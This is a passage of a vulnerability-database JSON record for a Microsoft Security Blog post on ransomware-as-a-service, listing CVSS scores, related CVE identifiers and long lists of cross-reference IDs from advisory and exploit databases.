protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "published": "2022-05-09T13:00:00", "modified": "2022-05-09T13:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "reporter": "Microsoft 365 Defender Threat Intelligence Team", "references": [], "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "immutableFields": [], "lastseen": "2022-05-09T16:00:24", "viewCount": 700, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:01E8B896-C436-4B08-BB3E-E254180DC879", "AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:0FA0C973-1E4C-48B7-BA36-DBE63803563D", "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:15082D97-CB46-4433-9BA3-6C37DC148340", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337", "AKB:5E706DDA-98EC-49CA-AB21-4814DAF26444", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:78B79B61-E949-48E9-BA41-A45CF0E9EA6C", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:89F43669-0248-4FDE-BCB2-4EEFE50D3A9B", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "AKB:EE68C1DD-4843-420D-B126-5C0A7277EFD4", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F1F3CDDE-5A72-4E56-8E80-8939F188EA99", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "cert", "idList": ["VU:213092", "VU:619785", "VU:927237", "VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187", "CPAI-2019-0392", "CPAI-2019-1097", "CPAI-2019-1653", "CPAI-2020-0118", "CPAI-2020-3448", "CPAI-2021-0554", "CPAI-2021-0877", "CPAI-2021-0900", "CPAI-2021-0936", "CPAI-2021-1113"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:134C272F26FB005321448C648224EB02", "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:B788AAE055F3DE2C255FCC0E7BE16B4B", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX267027", "CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2018-13379", "CVE-2019-0594", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-3100", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "dsquare", "idList": ["E-688", "E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:47287", "EDB-ID:47288", "EDB-ID:47297", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:50590", "EDB-ID:50592"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:338F0E4516B790140B04DBFA18EAAC20", "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "FIREEYE:85C9D5EC8130810CFB601AF3559E0DB6", "FIREEYE:9CF80EFF287EE06F7EC0094727FE9C26", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:D872F9CFF7406BD5A933C3819DBB6645", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-20-233", "FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "059DC199-E425-50EE-B5F5-E351E0323E69", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "0829A67E-3C24-5D54-B681-A7F72848F524", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "0990FE6E-7DC3-559E-9B84-E739872B988C", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "111C9F44-593D-5E56-8040-615B48ED3E24", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "241CA368-5AF2-555C-91EE-5D10B229F97D", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24DE1902-4427-5442-BF63-7657293966E2", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31DB22CD-3492-524F-9D26-035FC1086A71", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "38A11E23-686C-5C12-93FA-4A82D0E04202", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39093366-D071-5898-A67D-A99B956B6E73", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "46FA259E-5429-580C-B1D5-D1F09EB90023", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51858F11-1259-5A40-82DF-DD7D62A7B11A", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5DD13827-3FCE-5166-806D-088441D41514", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "6787DC40-24C2-5626-B213-399038EFB0E9", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6BC80C90-569E-5084-8C0E-891F12F1805E", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "721C46F4-C390-5D23-B358-3D4B22959428", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "730EEC4F-BE81-5690-BA8D-B89482C5C3D0", "7333A285-768C-5AD9-B64E-0EC75F075597", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7CEBB62C-173B-50CD-A252-B6522523EE57", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8DBBEAEC-C905-52CD-B95C-87663EA9C145", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "988A0BAB-669A-57AE-B432-564B2E378252", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", 